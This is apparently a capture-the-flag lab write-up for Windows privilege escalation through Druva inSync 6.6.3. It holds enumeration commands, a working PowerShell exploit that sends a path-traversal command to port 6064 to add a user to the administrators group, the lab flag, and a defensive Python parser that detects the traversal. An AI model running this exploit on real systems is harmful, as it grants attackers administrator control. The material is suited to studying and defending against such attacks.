Enumerate installed apps:

wmic product get name

Local ports:

netstat -ano | findstr 6064

Show running services:

get-service | ? {$_.DisplayName -like 'Druva*'}

Writeup

Vulnerable service: Druva inSync 6.6.3

Exploit: https://www.exploit-db.com/exploits/49211

$ErrorActionPreference = "Stop"

$cmd = "net localgroup administrators htb-student /add"

$s = New-Object System.Net.Sockets.Socket(
    [System.Net.Sockets.AddressFamily]::InterNetwork,
    [System.Net.Sockets.SocketType]::Stream,
    [System.Net.Sockets.ProtocolType]::Tcp
)
$s.Connect("127.0.0.1", 6064)

$header = [System.Text.Encoding]::UTF8.GetBytes("inSync PHC RPCW[v0002]")
$rpcType = [System.Text.Encoding]::UTF8.GetBytes("$([char]0x0005)`0`0`0")
$command = [System.Text.Encoding]::Unicode.GetBytes("C:\\ProgramData\\Druva\\inSync4\\..\\..\\..\\Windows\\System32\\cmd.exe /c $cmd");
$length = [System.BitConverter]::GetBytes($command.Length);

$s.Send($header)
$s.Send($rpcType)
$s.Send($length)
$s.Send($command)

Execute

→Aud1t_th0se_th1rd_paRty_s3rvices!
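
Added example, not part of the original notes or the Exploit-DB script: a defender-side parser for the request framing the script above sends to port 6064 (header, 4-byte type, 4-byte little-endian length, UTF-16LE command), with a check that flags a command whose executable path resolves outside the Druva directory. Assumptions: ALLOWED_DIR is taken from the path prefix used in the script, "helper.exe" is a hypothetical name, and both sample frames are constructed.

```python
import ntpath
import struct

HEADER = b"inSync PHC RPCW[v0002]"   # banner sent by the script above
RPC_RUN = 5                          # the 4-byte type value the script sends
ALLOWED_DIR = "C:\\ProgramData\\Druva\\inSync4"  # assumption: intended base dir


def parse_frame(data: bytes) -> str:
    """Return the UTF-16LE command carried in one request, or raise ValueError."""
    if not data.startswith(HEADER):
        raise ValueError("missing inSync header")
    body = data[len(HEADER):]
    if len(body) < 8:
        raise ValueError("truncated type/length fields")
    rpc_type, length = struct.unpack_from("<II", body)
    if rpc_type != RPC_RUN:
        raise ValueError(f"unexpected RPC type {rpc_type}")
    payload = body[8:8 + length]
    if len(payload) != length or length % 2:
        raise ValueError("length field does not match payload")
    return payload.decode("utf-16-le")


def escapes_allowed_dir(command: str) -> bool:
    """True when the executable path resolves outside ALLOWED_DIR."""
    # Simplification: the executable is everything before the first space.
    exe = command.split(" ", 1)[0]
    # normpath collapses "..", "." and repeated separators before comparing.
    resolved = ntpath.normcase(ntpath.normpath(exe))
    base = ntpath.normcase(ALLOWED_DIR) + "\\"
    return not resolved.startswith(base)


def _frame(command: str) -> bytes:
    """Build a constructed sample frame for the demo below."""
    raw = command.encode("utf-16-le")
    return HEADER + struct.pack("<II", RPC_RUN, len(raw)) + raw


# Constructed samples: "helper.exe" is a hypothetical name, not a Druva binary.
BENIGN = _frame("C:\\ProgramData\\Druva\\inSync4\\helper.exe -v")
TRAVERSAL = _frame(
    "C:\\ProgramData\\Druva\\inSync4\\..\\..\\..\\Windows\\System32\\cmd.exe /c ver"
)

if __name__ == "__main__":
    for name, frame in (("benign", BENIGN), ("traversal", TRAVERSAL)):
        cmd = parse_frame(frame)
        print(name, "escapes:", escapes_allowed_dir(cmd), "|", cmd)
```

A prefix comparison on the raw string passes both samples; only the comparison after normalization separates them.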